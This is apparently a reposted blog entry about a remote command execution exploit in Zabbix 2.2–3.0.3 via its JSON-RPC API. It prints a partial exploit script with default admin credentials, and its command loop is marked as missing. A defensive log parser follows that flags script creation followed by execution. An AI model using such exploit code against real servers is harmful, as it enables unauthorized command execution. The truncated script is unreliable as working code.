from:http://0x007.blog.51cto.com/6330498/1839957
Vulnerability source: https://www.exploit-db.com/exploits/39937/
Attack cost: high
Severity: low (this vulnerability requires a password)
Exploitation conditions: requires login as a high-privilege user
Affected versions: 2.2 up to 3.0.3
Tips:
This vulnerability requires you to have obtained the account password of a high-privilege user. Once you have those credentials you can also execute commands from the web backend; using the JSON-RPC API is a second approach.
This exp is not perfect, because it does not fetch the hostid automatically.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A

import requests
import json
import readline  # gives raw_input() line editing and history

ZABIX_ROOT = 'http://192.168.66.2'      ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php'   ### Zabbix JSON-RPC endpoint (url was left undefined in the posted copy)
login = 'Admin'                         ### Zabbix login account
password = 'zabbix'                     ### Zabbix password
hostid = '10084'                        ### Zabbix hostid of the host the command should run on

### auth
payload = {
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        'user': login,
        'password': password,
    },
    "auth": None,
    "id": 0,
}
headers = {
    'content-type': 'application/json',
}

auth = requests.post(url, data=json.dumps(payload), headers=headers)
auth = auth.json()  # the session token is returned in auth['result']

while True:
    cmd = raw_input('\033[41m[zabbix_cmd]>>: ')
    # The rest of the loop body is missing from the posted copy of the script.
    break
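As an added defender-side example (not part of the original post or the exploit-db script): the attack path above is only available to an already-authenticated high-privilege API user, so the practical detection point is the JSON-RPC traffic itself. The code below assumes a reverse proxy or WAF in front of /api_jsonrpc.php that logs each request body together with its source address (the "src"/"body" wrapper is an assumed log format, not Zabbix's own), and it assumes, as the hostid variable suggests, that the command is run through Zabbix's script API (script.create / script.execute). It groups script.* calls by source and auth token and flags any session that creates or updates a script and then executes it.

```python
import json
from collections import defaultdict

# Constructed sample log: one JSON object per line, as an assumed proxy in front
# of /api_jsonrpc.php might record requests. Tokens and addresses are made up.
SAMPLE_LOG = r'''
{"src": "10.0.0.5", "body": {"jsonrpc": "2.0", "method": "user.login", "params": {"user": "Admin", "password": "x"}, "auth": null, "id": 0}}
{"src": "10.0.0.5", "body": {"jsonrpc": "2.0", "method": "host.get", "params": {"output": ["hostid"]}, "auth": "tok-a", "id": 1}}
{"src": "10.0.0.9", "body": {"jsonrpc": "2.0", "method": "script.create", "params": {"name": "x", "command": "uname -a"}, "auth": "tok-b", "id": 1}}
{"src": "10.0.0.9", "body": {"jsonrpc": "2.0", "method": "script.execute", "params": {"scriptid": "7", "hostid": "10084"}, "auth": "tok-b", "id": 2}}
{"src": "10.0.0.9", "body": {"jsonrpc": "2.0", "method": "script.delete", "params": ["7"], "auth": "tok-b", "id": 3}}
this line is not JSON and must be skipped
'''

# Zabbix API methods that let an authenticated user define or run commands.
SCRIPT_METHODS = {"script.create", "script.update", "script.execute", "script.delete"}


def parse_log(text):
    """Yield (src, auth, method, params) for each well-formed log line."""
    for line in text.strip().splitlines():
        try:
            rec = json.loads(line)
            body = rec["body"]
            yield rec["src"], body.get("auth"), body["method"], body.get("params")
        except (ValueError, KeyError, TypeError):
            continue  # malformed line: skip it rather than crash the detector


def find_script_sessions(text):
    """Return sessions that created/updated a script and then executed it."""
    per_session = defaultdict(list)
    for src, auth, method, params in parse_log(text):
        if method in SCRIPT_METHODS:
            per_session[(src, auth)].append((method, params))
    findings = []
    for (src, auth), calls in per_session.items():
        methods = [m for m, _ in calls]
        if "script.execute" in methods and {"script.create", "script.update"} & set(methods):
            # Collect the hosts the commands were executed against for the alert.
            hosts = sorted({str(p.get("hostid")) for m, p in calls
                            if m == "script.execute" and isinstance(p, dict)})
            findings.append({"src": src, "auth": auth, "methods": methods, "hostids": hosts})
    return findings


if __name__ == "__main__":
    for f in find_script_sessions(SAMPLE_LOG):
        print("script abuse pattern from %s (auth %s): %s on hosts %s"
              % (f["src"], f["auth"], " -> ".join(f["methods"]), f["hostids"]))
```

Reading the API request bodies this way also shows why the page rates the severity low: every flagged call carries a valid admin session token, so the alert points straight at the compromised account.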